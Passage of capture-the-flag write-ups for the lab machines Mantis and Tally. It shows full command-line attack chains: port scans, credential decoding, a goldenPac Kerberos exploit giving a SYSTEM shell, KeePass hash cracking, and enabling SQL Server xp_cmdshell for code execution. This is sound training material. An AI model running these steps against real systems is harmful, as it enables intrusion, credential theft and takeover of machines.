This box is one example of a machine that has alot of ports opened, and yet these are not enough. you need to enumerate every port on this machine using nmap's -p- flag:
[ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
→ nmap -p- 10.10.10.52
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-02 19:57 GMT
Nmap scan report for 10.10.10.52
Host is up (0.037s latency).
Not shown: 65509 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
**1337/tcp open waste**
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
8080/tcp open http-proxy
9389/tcp open adws
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49172/tcp open unknown
50255/tcp open unknown
57110/tcp open unknown
57114/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 32.05 seconds
And here you see the port that we missed earlier: 1337:
![](prg/5/1.png)
So let's enumerate it with gobuster and a wordlist from seclists:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ sudo apt install seclists gobuster -y
[ 10.10.14.7/23 ] [ /dev/pts/6 ] [~]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.52:1337/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/02 20:09:19 Starting gobuster
===============================================================
/secure_notes (Status: 301)
Progress: 145379 / 220561 (65.91%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/01/02 20:18:25 Finished
===============================================================
And here we found the /secure_notes directory:
![](prg/5/2.png)
Let's see what's in dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez%
Now here we have a bit to talk about, first of all the string of text in the note name:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421
And here we get a hex string (0-9-a-f) so let's convert it back to ascii:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!
And here we have a sql password!
And that binary string gives us the following password: @dm!n_P@ssW0rd!
@dm!n_P@ssW0rd!
m$$ql_S@_P@ssW0rd!
The next part of this box is on port 8080 which is a blog:
![](prg/5/3.png)
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ curl 10.10.10.52:8080 2>/dev/null | grep Powered
Powered by [Orchard](http://www.orchardproject.net) (C) The Theme Machine 2021.
Let's try to find the administrator page of this Orchard website using gobuster:
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.52:8080
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.52:8080
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/02 20:47:55 Starting gobuster
===============================================================
/archive (Status: 200)
/blogs (Status: 200)
**/admin (Status: 302)**
/tags (Status: 200)
/Archive (Status: 200)
/pollArchive (Status: 200)
/Blogs (Status: 200)
/newsarchive (Status: 200)
/news_archive (Status: 200)
Let's investigate the /admin page with the credentials (admin:@dm!n_P@ssW0rd!) we found earlier:
![](prg/5/4.png)
And we're logged in as admin!
![](prg/5/5.png)
However this is kind of a rabbithole, therefore you see why this can be a hard box, The next step is to poke around port 1433
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ sudo apt install dbeaver -y
` ![](prg/5/6.png) ![](prg/5/7.png) ![](prg/5/8.png) ![](prg/5/9.png)
And here we have found the user james' credentials:
james@htb.local
J@m3s_P@ssW0rd!
## **Part 3 : Getting Root Access**
Now in order to gain root access on the box we're going to use psexec:
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ locate goldenPac.py
/usr/share/doc/python3-impacket/examples/goldenPac.py
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ cd /usr/share/doc/python3-impacket/examples/
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [doc/python3-impacket/examples]
→ python3 goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
Once you have pasted in jame's password, wait a bit for impacket to do it's magic, and you will get root shell on the box :
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [doc/python3-impacket/examples]
→ python3 goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[-] Couldn't get forest info ([Errno Connection error (htb.local:445)] timed out), continuing
[*] Attacking domain controller 10.10.10.52
[*] 10.10.10.52 found vulnerable!
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
[*] Uploading file cviDLGQS.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service dqDR on 10.10.10.52.....
[*] Starting service dqDR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
nt authority\system
From here type both flags:
C:\Windows\system32>type C:\Users\james\Desktop\user.txt
8aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
20XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And there you have it!
## **Conclusion**
Here we can see the progress graph :
![](img/5_graph.png)

797
Hard/6.md Normal file
View file

@ -0,0 +1,797 @@
# Tally Writeup
![](img/7.png)
## Introduction :
Tally is a hard windows box released back in November 2017.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
→ sudo nmap -vvv -sTU -p- 10.10.10.59 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 139/tcp on 10.10.10.59
Discovered open port 135/tcp on 10.10.10.59
Discovered open port 21/tcp on 10.10.10.59
Discovered open port 80/tcp on 10.10.10.59
Discovered open port 445/tcp on 10.10.10.59
Discovered open port 47001/tcp on 10.10.10.59
Discovered open port 49665/tcp on 10.10.10.59
Discovered open port 32846/tcp on 10.10.10.59
Discovered open port 32844/tcp on 10.10.10.59
Discovered open port 49666/tcp on 10.10.10.59
Discovered open port 49669/tcp on 10.10.10.59
Discovered open port 32843/tcp on 10.10.10.59
Discovered open port 15567/tcp on 10.10.10.59
Discovered open port 81/tcp on 10.10.10.59
Discovered open port 49670/tcp on 10.10.10.59
Discovered open port 5985/tcp on 10.10.10.59
Discovered open port 1433/tcp on 10.10.10.59
Discovered open port 49668/tcp on 10.10.10.59
Discovered open port 808/tcp on 10.10.10.59
Discovered open port 49667/tcp on 10.10.10.59
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
→ nmap -sCV -p21,80,81,135,139,445,808,1443 10.10.10.59
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 18:12 CET
Nmap scan report for 10.10.10.59
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-generator: Microsoft SharePoint
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1443/tcp closed ies-lm
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-22T17:12:21
|_ start_date: 2020-12-22T17:08:42
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.79 seconds
## **Part 2 : Getting User Access**
nmap found port 80 so let's run gobuster on it:
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ echo '10.10.10.59 tally.htb' >> /etc/hosts
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u http://tally.htb/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://tally.htb/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/22 18:18:15 Starting gobuster
===============================================================
/_app_bin (Status: 301)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/wt/forms/common.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/3082: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_admin: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_admin/operations.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/1033: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/50: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/wp/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/masterpage/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/60: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/22 18:18:30 [!] Get http://tally.htb/_catalogs/lt/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/_layouts (Status: 301)
/_controltemplates (Status: 301)
/_layouts/1033 (Status: 301)
/_layouts/1033/avreport.htm (Status: 200)
/_layouts/1033/filedlg.htm (Status: 200)
/_layouts/1033/fontdlg.htm (Status: 200)
/_layouts/1033/error.htm (Status: 200)
/_layouts/1033/images (Status: 301)
/_layouts/1033/iframe.htm (Status: 200)
/_layouts/1033/instable.htm (Status: 200)
/_layouts/1033/menu.htc (Status: 200)
/_layouts/1033/menubar.htc (Status: 200)
/_layouts/1033/selcolor.htm (Status: 200)
/_layouts/1033/spthemes.xml (Status: 200)
/_layouts/1033/spthemes.xsd (Status: 200)
/_layouts/accessdenied.aspx (Status: 302)
/_layouts/addfieldfromtemplate.aspx (Status: 302)
/_layouts/aclinv.aspx (Status: 302)
/_layouts/addrole.aspx (Status: 302)
/_layouts/addcontenttypetolist.aspx (Status: 302)
/_layouts/addwrkfl.aspx (Status: 302)
/_layouts/adminrecyclebin.aspx (Status: 302)
/_layouts/approve.aspx (Status: 302)
/_layouts/advsetng.aspx (Status: 302)
/_layouts/aspxform.aspx (Status: 302)
/_layouts/addnavigationlinkdialog.aspx (Status: 200)
/_layouts/addfiletype.aspx (Status: 200)
/_layouts/areacachesettings.aspx (Status: 200)
/_layouts/areanavigationsettings.aspx (Status: 200)
/_layouts/addcontentsource.aspx (Status: 200)
/_layouts/areatemplatesettings.aspx (Status: 200)
/_layouts/areawelcomepage.aspx (Status: 200)
/_layouts/associatedgroups.aspx (Status: 302)
/_layouts/assocwrkfl.aspx (Status: 302)
/_layouts/addservernamemappings.aspx (Status: 200)
/_layouts/assetedithyperlink.aspx (Status: 200)
/_layouts/assetportalbrowser.aspx (Status: 200)
/_layouts/audience_defruleedit.aspx (Status: 200)
/_layouts/audience_edit.aspx (Status: 200)
/_layouts/audience_main.aspx (Status: 200)
/_layouts/audience_sched.aspx (Status: 200)
/_layouts/assetuploader.aspx (Status: 200)
/_layouts/audience_memberlist.aspx (Status: 200)
/_layouts/audience_list.aspx (Status: 200)
/_layouts/assetimagepicker.aspx (Status: 200)
/_layouts/backlinks.aspx (Status: 302)
/_layouts/avreport.aspx (Status: 302)
/_layouts/authenticate.aspx (Status: 302)
/_layouts/bdcadminui/addbdcapplication.aspx (Status: 200)
/_layouts/bdcadminui/bdcapplications.aspx (Status: 200)
/_layouts/auditsettings.aspx (Status: 200)
/_layouts/barcodeimagefromitem.aspx (Status: 200)
/_layouts/bdcadminui/bdcentities.aspx (Status: 200)
/_layouts/bdcadminui/editbdcaction.aspx (Status: 200)
/_layouts/audience_view.aspx (Status: 200)
/_layouts/bdcadminui/addbdcaction.aspx (Status: 200)
Basically out of this garbage you had to find _layouts/15/viewlsts.aspx
![](prg/6/1.png)
Into Documents there's a file called "ftp-details"
![](prg/6/2.png)
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ mv ~/Downloads/ftp-details.docx .
mv: cannot stat '/home/nothing/Downloads/ftp-details.docx': No such file or directory
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ ls -lash ftp-details.docx
12K -rw-r--r-- 1 nothing nothing 11K Dec 22 18:23 ftp-details.docx
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
→ file ftp-details.docx
ftp-details.docx: Zip archive data, at least v1.0 to extract
[ 10.10.14.6/23 ] [ /dev/pts/3 ] [~/_HTB/Tally]
→ lowriter ftp-details.docx
` ![](prg/6/4.png)
So we can add that domain name to our hosts file:
[ 10.10.14.6/23 ] [ /dev/pts/6 ] [~/_HTB/Tally]
→ sudo vim /etc/hosts
10.10.10.59 tally.htb tally.htb.local
And on Site Pages you're supposed to get a file called "FinanceTeam"
![](prg/6/3.png) ![](prg/6/5.png)
So here we're hinted towards a ftp_user account for the "intranet folder", so we could have credentials from what we gathered so far : **ftp_user:UTDRSCH53c"$6hys**. And obviously we're going to try to login via ftp since our nmap scan picked up port 21:
[ 10.10.14.6/23 ] [ /dev/pts/8 ] [~]
→ ftp 10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
Name (10.10.10.59:nothing): ftp_user
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-31-17 10:51PM <****DIR> From-Custodian
10-01-17 10:37PM <****DIR> Intranet
08-28-17 05:56PM <****DIR> Logs
09-15-17 08:30PM <****DIR> To-Upload
09-17-17 08:27PM <****DIR> User
226 Transfer complete.
ftp> exit
221 Goodbye.
And here we get a few directories so let's just use wget to get what they contain recursively:
[ 10.10.14.6/23 ] [ /dev/pts/8 ] [_HTB/Tally/ftp]
→ wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@tally.htb.local'
--2020-12-22 23:06:07-- ftp://ftp_user:*password*@tally.htb.local/
=> tally.htb.local/.listing
Resolving tally.htb.local (tally.htb.local)... 10.10.10.59
Connecting to tally.htb.local (tally.htb.local)|10.10.10.59|:21... connected.
Logging in as ftp_user ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> PASV ... done. ==> LIST ... done.
tally.htb.local/.listing [ <=> ] 244 --.-KB/s in 0s
==> PASV ... done. ==> LIST ... done.
[...]
And now let's go through what we're downloading:
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [_HTB/Tally/ftp]
→ du -hs tally.htb.local
99M tally.htb.local
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [_HTB/Tally/ftp]
→ tree tally.htb.local
tally.htb.local
├── From-Custodian
│   ├── RED-528103410.log
│   ├── RED-528113411.log
│   ├── RED-528123412.log
│   ├── RED-528133413.log
│   ├── RED-5281341.log
│   ├── RED-528143414.log
│   ├── RED-528153415.log
│   ├── RED-528163416.log
│   ├── RED-528173417.log
│   ├── RED-528183418.log
│   ├── RED-528193419.log
│   ├── RED-528203420.log
│   ├── RED-528213421.log
│   ├── RED-528223422.log
│   ├── RED-528233423.log
│   ├── RED-5282342.log
│   ├── RED-528243424.log
│   ├── RED-528253425.log
│   ├── RED-528263426.log
│   ├── RED-528273427.log
│   ├── RED-528283428.log
│   ├── RED-528293429.log
│   ├── RED-528303430.log
│   ├── RED-528313431.log
│   ├── RED-528323432.log
│   ├── RED-528333433.log
│   ├── RED-5283343.log
│   ├── RED-528343434.log
│   ├── RED-528353435.log
│   ├── RED-528363436.log
│   ├── RED-528373437.log
│   ├── RED-528383438.log
│   ├── RED-528393439.log
│   ├── RED-528403440.log
│   ├── RED-528413441.log
│   ├── RED-528423442.log
│   ├── RED-528433443.log
│   ├── RED-5284344.log
│   ├── RED-528443444.log
│   ├── RED-528453445.log
│   ├── RED-528463446.log
│   ├── RED-528473447.log
│   ├── RED-528483448.log
│   ├── RED-528493449.log
│   ├── RED-528503450.log
│   ├── RED-5285345.log
│   ├── RED-5286346.log
│   ├── RED-5287347.log
│   ├── RED-5288348.log
│   └── RED-5289349.log
├── Intranet
│   └── Binaries
│   └── Firefox Setup 44.0.2.exe
├── Logs
│   ├── ftp_connect_8235771490510.txt
│   ├── ftp_connect_8235771490511.txt
│   ├── ftp_connect_8235771490512.txt
│   ├── ftp_connect_8235771490513.txt
│   ├── ftp_connect_8235771490514.txt
│   ├── ftp_connect_8235771490515.txt
│   ├── ftp_connect_8235771490516.txt
│   ├── ftp_connect_8235771490517.txt
│   ├── ftp_connect_8235771490518.txt
│   ├── ftp_connect_8235771490519.txt
│   ├── ftp_connect_823577149051.txt
│   ├── ftp_connect_8235771490520.txt
│   ├── ftp_connect_8235771490521.txt
│   ├── ftp_connect_8235771490522.txt
│   ├── ftp_connect_8235771490523.txt
│   ├── ftp_connect_8235771490524.txt
│   ├── ftp_connect_8235771490525.txt
│   ├── ftp_connect_8235771490526.txt
│   ├── ftp_connect_8235771490527.txt
│   ├── ftp_connect_8235771490528.txt
│   ├── ftp_connect_8235771490529.txt
│   ├── ftp_connect_823577149052.txt
│   ├── ftp_connect_8235771490530.txt
│   ├── ftp_connect_8235771490531.txt
│   ├── ftp_connect_8235771490532.txt
│   ├── ftp_connect_8235771490533.txt
│   ├── ftp_connect_8235771490534.txt
│   ├── ftp_connect_8235771490535.txt
│   ├── ftp_connect_8235771490536.txt
│   ├── ftp_connect_8235771490537.txt
│   ├── ftp_connect_8235771490538.txt
│   ├── ftp_connect_8235771490539.txt
│   ├── ftp_connect_823577149053.txt
│   ├── ftp_connect_8235771490540.txt
│   ├── ftp_connect_8235771490541.txt
│   ├── ftp_connect_8235771490542.txt
│   ├── ftp_connect_8235771490543.txt
│   ├── ftp_connect_8235771490544.txt
│   ├── ftp_connect_8235771490545.txt
│   ├── ftp_connect_8235771490546.txt
│   ├── ftp_connect_8235771490547.txt
│   ├── ftp_connect_8235771490548.txt
│   ├── ftp_connect_8235771490549.txt
│   ├── ftp_connect_823577149054.txt
│   ├── ftp_connect_8235771490550.txt
│   ├── ftp_connect_823577149055.txt
│   ├── ftp_connect_823577149056.txt
│   ├── ftp_connect_823577149057.txt
│   ├── ftp_connect_823577149058.txt
│   └── ftp_connect_823577149059.txt
├── To-Upload
│   ├── employees-id_number.xlsx
│   └── Invoices.zip
└── User
├── Administrator
│   └── New folder
├── Ekta
│   ├── OFSI_quick_guide_flyer.pdf
│   └── PSAIS_1_April_2017.pdf
├── Jess
│   └── actu8-espreadsheet-designer-datasheet.pdf
├── Paul
│   ├── financial-list-guide.pdf
│   ├── financial_sanctions_guidance_august_2017.pdf
│   ├── Monetary_penalties_for_breaches_of_financial_sanctions.pdf
│   └── New folder
├── Rahul
│   └── Mockups-Backup
├── Sarah
│   ├── MBSASetup-x64-EN.msi
│   ├── notes.txt
│   └── Windows-KB890830-x64-V5.52.exe
├── Stuart
│   ├── customers - Copy.csv
│   └── Unit4-Connect-Financials-Agenda.pdf
├── Tim
│   ├── Files
│   │   ├── bonus.txt
│   │   ├── KeePass-2.36
│   │   │   ├── KeePass.chm
│   │   │   ├── KeePass.exe
│   │   │   ├── KeePass.exe.config
│   │   │   ├── KeePassLibC32.dll
│   │   │   ├── KeePassLibC64.dll
│   │   │   ├── KeePass.XmlSerializers.dll
│   │   │   ├── License.txt
│   │   │   ├── Plugins
│   │   │   ├── ShInstUtil.exe
│   │   │   └── XSL
│   │   │   ├── KDBX_Common.xsl
│   │   │   ├── KDBX_DetailsFull_HTML.xsl
│   │   │   ├── KDBX_DetailsLight_HTML.xsl
│   │   │   ├── KDBX_PasswordsOnly_TXT.xsl
│   │   │   └── KDBX_Tabular_HTML.xsl
│   │   └── tim.kdbx
│   └── Project
│   ├── Communications
│   ├── Log
│   │   └── do to.txt
│   └── Vendors
└── Yenwi
└── Archive
27 directories, 130 files
And here we see something interesting, there is a keepass kdbx file in User/Tim/Files/tim.kdbx, so we're going to use keepass2john to extract the hash we need:
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [User/Tim/Files]
→ keepass2john tim.kdbx
tim:$keepass$*2*6000*0*f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9d66a375efb*3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea*3f759d7011f43b30679a5ac650991caa*b45da6b5b0115c5a7fb688f8179a19a749338510dfe90aa5c2cb7ed37f992192*535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc1cd7da
Save the hash somewhere, then use hashcat to crack it:
hashcat -m 13400 tim.hash /usr/share/wordlists/rockyou.txt
and once it finishes hashcat gives us the password we need : simplementeyo
![](prg/6/5.png) ![](prg/6/6.png) ![](prg/6/7.png)
And we have new credentials! Finance:Acc0unting, and cisco:cisco123. So first let's investigate the ACCT share the keepass file hints us towards:
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [User/Tim/Files]
→ sudo -i
[sudo] password for nothing:
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
→ mkdir /mnt/smb
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
→ mount -t cifs -o username=Finance password=Acc0unting //10.10.10.59/ACCT /mnt/smb
mount: bad usage
Try 'mount --help' for more information.
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
→ mount -t cifs -o username=Finance //10.10.10.59/ACCT /mnt/smb
🔐 Password for Finance@//10.10.10.59/ACCT: **********
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
→cd /mnt/smb
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
→ ls -l
total 0
drwxr-xr-x 2 root root 0 Sep 17 2017 Customers
drwxr-xr-x 2 root root 0 Aug 28 2017 Fees
drwxr-xr-x 2 root root 0 Aug 28 2017 Invoices
drwxr-xr-x 2 root root 0 Sep 17 2017 Jess
drwxr-xr-x 2 root root 0 Aug 28 2017 Payroll
drwxr-xr-x 2 root root 0 Sep 1 2017 Reports
drwxr-xr-x 2 root root 0 Sep 17 2017 Tax
drwxr-xr-x 2 root root 0 Sep 13 2017 Transactions
drwxr-xr-x 2 root root 0 Sep 15 2017 zz_Archived
drwxr-xr-x 2 root root 0 Sep 17 2017 zz_Migration
So the goal here was to navigate into zz_Migration/Binaries/New\ Folder
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
→ cd zz_Migration/Binaries/New\ Folder
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [zz_Migration/Binaries/New Folder]
→ ls -l
total 676308
-rwxr-xr-x 1 root root 389188014 Sep 13 2017 crystal_reports_viewer_2016_sp04_51051980.zip
-rwxr-xr-x 1 root root 18159024 Sep 11 2017 Macabacus2016.exe
-rwxr-xr-x 1 root root 21906356 Aug 30 2017 Orchard.Web.1.7.3.zip
-rwxr-xr-x 1 root root 774200 Sep 17 2017 putty.exe
-rwxr-xr-x 1 root root 483824 Sep 15 2017 RpprtSetup.exe
-rwxr-xr-x 1 root root 254599112 Sep 11 2017 tableau-desktop-32bit-10-3-2.exe
-rwxr-xr-x 1 root root 215552 Sep 1 2017 tester.exe
-rwxr-xr-x 1 root root 7194312 Sep 13 2017 vcredist_x64.exe
And here you had to extract passwords out of tester.exe using strings:
[ 10.10.14.6/23 ] [ /dev/pts/9 ] [zz_Migration/Binaries/New Folder]
→ strings tester.exe | grep SQL
SQLSTATE:
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
So here we have credentials for a SQL server on port 1433 : sa:GWE3V65#6KFH93@4GWTG2G
[ 10.10.14.6/23 ] [ /dev/pts/11 ] [~]
→ sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> xp_cmdshell 'id'
2> go
Msg 15281, Level 16, State 1
Server 'TALLY', Procedure 'xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the
security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more
information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
1>
So we're connected but component xp_cmdshell is turned off, so let's turn it on:
1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go
Msg 15123, Level 16, State 1
Server 'TALLY', Procedure 'sp_configure', Line 62
The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
(return status = 1)
And it seems like the xp_cmdshell option doesn't exist, so let's enable advanced options:
1> EXEC SP_CONFIGURE 'show advanced options', 1
2> reconfigure
3> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> EXEC SP_CONFIGURE 'xp_cmdshell', 1
2> reconfigure
3> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> xp_cmdshell "whoami"
2> go
output
-------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
tally\sarah
NULL
(2 rows affected, return status = 0)
And there we have it, we have code execution as the sarah user:
1> xp_cmdshell "whoami /priv"
2> go
output
-------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
